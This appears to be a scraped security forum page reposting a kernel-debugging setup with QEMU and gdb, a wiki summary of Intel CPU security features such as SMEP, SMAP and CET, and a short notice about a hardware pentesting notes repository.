mkfs.ext4 rootfs.img mkdir mnt sudo mount -o loop rootfs.img mnt/ sudo debootstrap bionic mnt/ # Add following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf # START [Service] ExecStart= ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM Type=idle # END # Unmount the filesystem sudo umount mnt # Boot Kernel with root file system in QEMU qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s # Attach gdb gdb ./linux-4.20.6/vmlinux (gdb) target remote :1234 Sursa: https://www.anmolsarma.in/post/single-step-kernel/
      • 2
      • Upvote
  24. Intel CPU security features huku edited this page on Jul 31, 2016 · 23 revisions Intel CPU security features List of Intel CPU security features along with short descriptions taken from the Intel manuals. WP (Write Protect) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP). Interesting links: WP: Safe or Not? NXE/XD (No-Execute Enable/Execute Disable) (PDF) Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3): IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instructions fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed). IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging. Regarding XD (Volume 3A, 4-17, Table 4-11): If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0). SMAP (Supervisor Mode Access Protection) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC. SMEP (Supervisor Mode Execution Protection) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode. MPX (Memory Protection Extensions) (PDF) Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow). Interesting links: Intel MPX support in the GCC compiler Intel Memory Protection Extensions (Intel MPX) for Linux intel_mpx.txt in Linux Kernel documentation SGX (Software Guard Extensions) (PDF) These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented. Interesting links: Intel Software Guard Extensions (SGX): A Researcher’s Primer CreateEnclave function at MSDN Protection keys (PDF) Quoting Volume 3A, 4-31, Paragraph 4.6.2: The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written. The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys: One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large. There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack. Another commonly mentioned use case is to protect regions of data from being corrupted by "stray" write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow. CET (Control-flow Enforcement Technology) (PDF) Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks: Shadow Stack – return address protection to defend against Return Oriented Programming, Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming. Sursa: https://github.com/huku-/research/wiki/Intel-CPU-security-features
      • 1
      • Upvote
  25. PentestHardware Kinda useful notes collated together publicly Comments and Fixes - some very kind people have begun to proofread this as I am writing it. It's still a long way from being finished, but comments are always welcome. Make an issue and provide comments in-PDF if you can. NB - this is very much a work in progress, released early for comments and feedback. Hoping to complete first full version by XMas 2018. For the current releases, this material is released under Creative Commons v3.0 - quote me all you like, and reference my work no problem, print copies for yourselves, but just leave my name on it. Sursa: https://github.com/unprovable/PentestHardware
      • 1
      • Upvote
×
×
  • Create New...